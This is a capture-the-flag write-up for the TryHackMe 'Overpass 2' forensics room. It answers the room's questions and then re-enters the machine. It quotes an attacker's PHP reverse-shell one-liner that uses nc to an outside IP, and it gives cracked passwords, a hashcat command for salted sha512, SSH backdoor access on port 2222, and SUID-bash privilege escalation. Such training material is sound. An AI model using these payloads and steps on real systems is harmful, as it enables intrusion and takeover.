TryHackMe-Overpass 2

A Forensics Room involving an analysis on how Hackers got into the system and finding their activity.

What was the URL of the page they used to upload a reverse shell? /development

What payload did the attacker use to gain access?

<?php exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f”)?>

What password did the attacker use to privesc?

whenevernoteartinstant

How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

Using the fasttrack wordlist, how many of the system passwords were crackable?

4

password after cracking

What’s the default hash for the backdoor?

(MAKE SURE YOU CLONE THE GITHUB REPOSITORY OF SSH BACKDOOR FIRST and then open the main.go file)

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

What’s the hardcoded salt for the backdoor?

1c362db832f3f864c8c2fe05f2002a05

What was the hash that the attacker used? — go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

If you go to the main.go file and read the hashpassword function, you will find that it has a sha512 password + salt

Simply using john or crackstation wont help.Therefore we try to look for the format (sha514 password+hash) on hashcat using the command

hashcat -help to see all usage and we find this in number 1710 which has the format sha512($pass.$salt) so we use it

Basically This is the command we use:

hashcat -m 1710 -a 0 -o outputfile.txt hashfile.txt passwordlist.txt

The hashfile which in my case is heshh.txt must contain

password hash:hardcoded salt

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

(If you are confused, look at the answers above)

Once its done, we got out cracked password in crackpass.txt and the password is november16

The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

Now this part was a bit confusing i tried to run the ./backdoor command(as left by attacker in the pcap file) but i was unable to get in.

After nmap scan i saw that port 22 and 2222 were open and using ssh.I tried connecting to 22 using both the password november16 and whenevernoteartinstant but was not able to get in.

However if you connect to ssh on port 2222 using the -p option to specify port, we can get it in.

The user flag can be found in /home/james directory

I tried looking around in /var/www/html which often contains juicy information and configuration files and i found this in index.html however this info was not useful.

We run sudo -l to see all command we can execute however it asks for password so lets move on…

Now Run ls -la to see all files and we immediately see a executable bash file in red named .suid_bash which is owned by root.You can also try running linpeas or running the find command as i did to find SUID files

We can also go to GTFO bins website and search “bash” and click on the SUID option since we have a bash SUID file

and we immediately see a command ./bash -p

Basically if you run the bash file with -p option, the -p option will run it with the privileges of the Effective User Id (root)

Run the command ./.suid_bash -p

and it will spawn a bash shell… now change directory to root and view the root flag……. cd /root and then, cat root.txt

This was a pretty fun room and different from the general ones and i hope you learned from this writeup-ZEUS

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube